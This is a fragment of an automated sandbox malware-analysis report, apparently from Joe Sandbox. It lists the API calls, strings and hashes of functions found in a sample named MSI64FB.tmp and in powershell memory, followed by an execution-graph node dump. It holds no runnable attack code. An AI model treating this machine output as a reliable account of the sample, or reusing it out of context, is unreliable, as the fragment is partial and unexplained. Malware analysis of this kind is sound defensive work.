                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 195334829-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 195334829-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF749F46936,?,?,00007FF749F46936,00007FF749F50B77), ref: 00007FF749F5098F
                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF749F50A1F
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F50A25
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocConcurrency::cancel_current_taskLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3382108686-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Free$Local$CertCertificateContext_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 976693150-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3604237281-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • PathIsUNCW.SHLWAPI(?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,00007FF749F45537), ref: 00007FF749F49AC5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Path
                                                                                                                                                                                                                                                    • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                    • API String ID: 2875597873-3019864461
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00007FF749F4A9A1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                                                                                                                                                                                                                                    • API String ID: 195334829-1713319389
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 1467352782-3733052814
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: CreateFrameInfo__except_validate_context_record
• String ID: csm
• API String ID: 2558813199-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: FileModuleName_invalid_parameter_noinfo
• String ID: C:\Windows\Installer\MSI64FB.tmp
• API String ID: 3307058713-4156019801
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: FreeLocal$_invalid_parameter_noinfo_noreturn
• String ID: vector too long
• API String ID: 2955324198-2873823879
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 3988782225-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: ff4bfb7af1a39cdc8712dbd924c773a99782365ab42b7c759bc4d989940ead36
                                                                                                                                                                                                                                                    • Instruction ID: bc1d06d1cdd16f1467af4fd7faac68c7c6f6fdb0f1761c44a4c879bce6fa5c33
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff4bfb7af1a39cdc8712dbd924c773a99782365ab42b7c759bc4d989940ead36
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD016223509B81D9D748EF75A840158B7B5FB58B987685239CA8D8375EEF38C590C350
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF749F52BC6), ref: 00007FF749F79E84
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF749F52BC6), ref: 00007FF749F79EC5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: e981e9375f5199886df9adb2645ac098046de6b51e66eaec7fe24d2fd6eccca5
                                                                                                                                                                                                                                                    • Instruction ID: d21abc3d8100134570c29014f26d04d134a059c2c0369da5a0dcedb658edb328
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e981e9375f5199886df9adb2645ac098046de6b51e66eaec7fe24d2fd6eccca5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511EC3261CB4182EB61AF15E440269B7F5FB88B94F684275EF8D07BA8DF3CD5518710
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConvertFreeLocalString
                                                                                                                                                                                                                                                    • String ID: Invalid SID
                                                                                                                                                                                                                                                    • API String ID: 3201929900-130637731
                                                                                                                                                                                                                                                    • Opcode ID: 4d0ccbe9cd87c67762e3f45dff726abbddade60e00e70dc2fdb163d8ac8d1d79
                                                                                                                                                                                                                                                    • Instruction ID: f676997c7c5fafe2272208d0e2184535e2cf55512157de9668883bb2efeb1782
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d0ccbe9cd87c67762e3f45dff726abbddade60e00e70dc2fdb163d8ac8d1d79
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1113072A1C741C2EB14AF11F540569E2B0FB94B94F805335EAA9077D8DF7CD1508750
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2130991519.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: dc1f1049a5fe23ab2eab0d4e73b558fd56eabd8cdbeb9d9d4f833aeade5494f9
                                                                                                                                                                                                                                                    • Instruction ID: 30a4dff25ca1deb538b4330a9ac77e414840ad7bb5eaf77d3cfb405eb515ca52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc1f1049a5fe23ab2eab0d4e73b558fd56eabd8cdbeb9d9d4f833aeade5494f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E222962B0E7D90FE7AA876858355783FD0EF52324B0A01FFD199CB0E3D9186D069782
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2135794305.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b690000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1c5fd734400e960e8fcffaa3aeee35cbd54fb5efddc5a793df1e8fe05e2e89b2
                                                                                                                                                                                                                                                    • Instruction ID: 5bb157f52d947b684edce7841997286f0cd3f7a381c8b1c04c45bd5b5723a14e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c5fd734400e960e8fcffaa3aeee35cbd54fb5efddc5a793df1e8fe05e2e89b2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6F1F862B0EB8A4FE7A99B6848715757BD1EF55B10B0900FED06DCB1E3EE19BC058341
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2135794305.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b690000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0903e2e740332e71f005d2c77e7b2efa2c90922869f9fcd473c102afa927ff04
                                                                                                                                                                                                                                                    • Instruction ID: c69f79d4f1abe0ab0646220864c60c790da359446325d977b5febb8ef287ab2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0903e2e740332e71f005d2c77e7b2efa2c90922869f9fcd473c102afa927ff04
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41E11762B0EA894FEBA9DB6844606747BE1EF55B10B1900FBD06CCB1E7EE19BC45C341
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e2260aa269570e1436e8612411708ba6274df584ecf60b4a3985e168e43a0f5a
                                                                                                                                                                                                                                                    • Instruction ID: c571f6ec55259e6e300ef7ba04171bb74eb014d04207a88abf1cacf0b2a74e42
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2260aa269570e1436e8612411708ba6274df584ecf60b4a3985e168e43a0f5a
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 66d60a874b8624b421b07fb33a53568edc43e6d9008f280db89017bb8d553167
                                                                                                                                                                                                                                                    • Instruction ID: d31b5006325f8ef263d4abb335ea731c2ca58afde82f4ec2c7c84afab156e4e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66d60a874b8624b421b07fb33a53568edc43e6d9008f280db89017bb8d553167
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35211B31A1894D8FDF98EF58C455EEDB7A1FF68310F55016AD40AD7296CA24EC82CBC1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2130991519.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2db57d31e03f5e260f9bdff5c26d2b06b17d6851609650a8b95421c3fbbd8653
                                                                                                                                                                                                                                                    • Instruction ID: 10e888a19e6abb514759635f79bba6fcdc427d284c5aeed366299e7b16c96a8e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2db57d31e03f5e260f9bdff5c26d2b06b17d6851609650a8b95421c3fbbd8653
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C111C132A0E9990FE7B5D79844649B87BD0FF04328B5A01FEE25DC70A7DA18AD019B81
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bba1f6f2c3413fea2861be6c54a280d72ca63e2477c7ece28d0edd84f54e719d
                                                                                                                                                                                                                                                    • Instruction ID: c5acc29962d536c393317c1d71d6ee65ded51257c2ec840508e91a7300ca2935
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba1f6f2c3413fea2861be6c54a280d72ca63e2477c7ece28d0edd84f54e719d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2501A73021CB0C8FD748EF4CE051AB5B7E0FB95324F50056EE58AC36A1D636E882CB41
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: N_^$N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                    • API String ID: 0-1364355708
                                                                                                                                                                                                                                                    • Opcode ID: 23a042ca7da7d5eff138762370b32f576ad985e8018a655b08c29e694c1960c2
                                                                                                                                                                                                                                                    • Instruction ID: b68e7a872e442696b099ee14216ba47742d0d71518eeb7537258a41753cc7190
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23a042ca7da7d5eff138762370b32f576ad985e8018a655b08c29e694c1960c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F161A393F1F9CB4BE775A6992C750606B91EF61358B0A03FBC1988B1E3ED1929074246
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                    • API String ID: 0-3900292545
                                                                                                                                                                                                                                                    • Opcode ID: fe2f3c3b9851b6409a836a89c460dfdc0715d768fd2f8491b5b7ee6f8b668e21
                                                                                                                                                                                                                                                    • Instruction ID: d4f532eeb521295e9dbe6c15893411f46617b98a04305820e6b13d8591841fa5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe2f3c3b9851b6409a836a89c460dfdc0715d768fd2f8491b5b7ee6f8b668e21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A31EC56D0F7C51FE763A6B828754953FA06F13654B0B02FBC5E98F0F3E958294A8322

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:17.7%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:12.4%
                                                                                                                                                                                                                                                    Total number of Nodes:1482
                                                                                                                                                                                                                                                    Total number of Limit Nodes:27
3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 
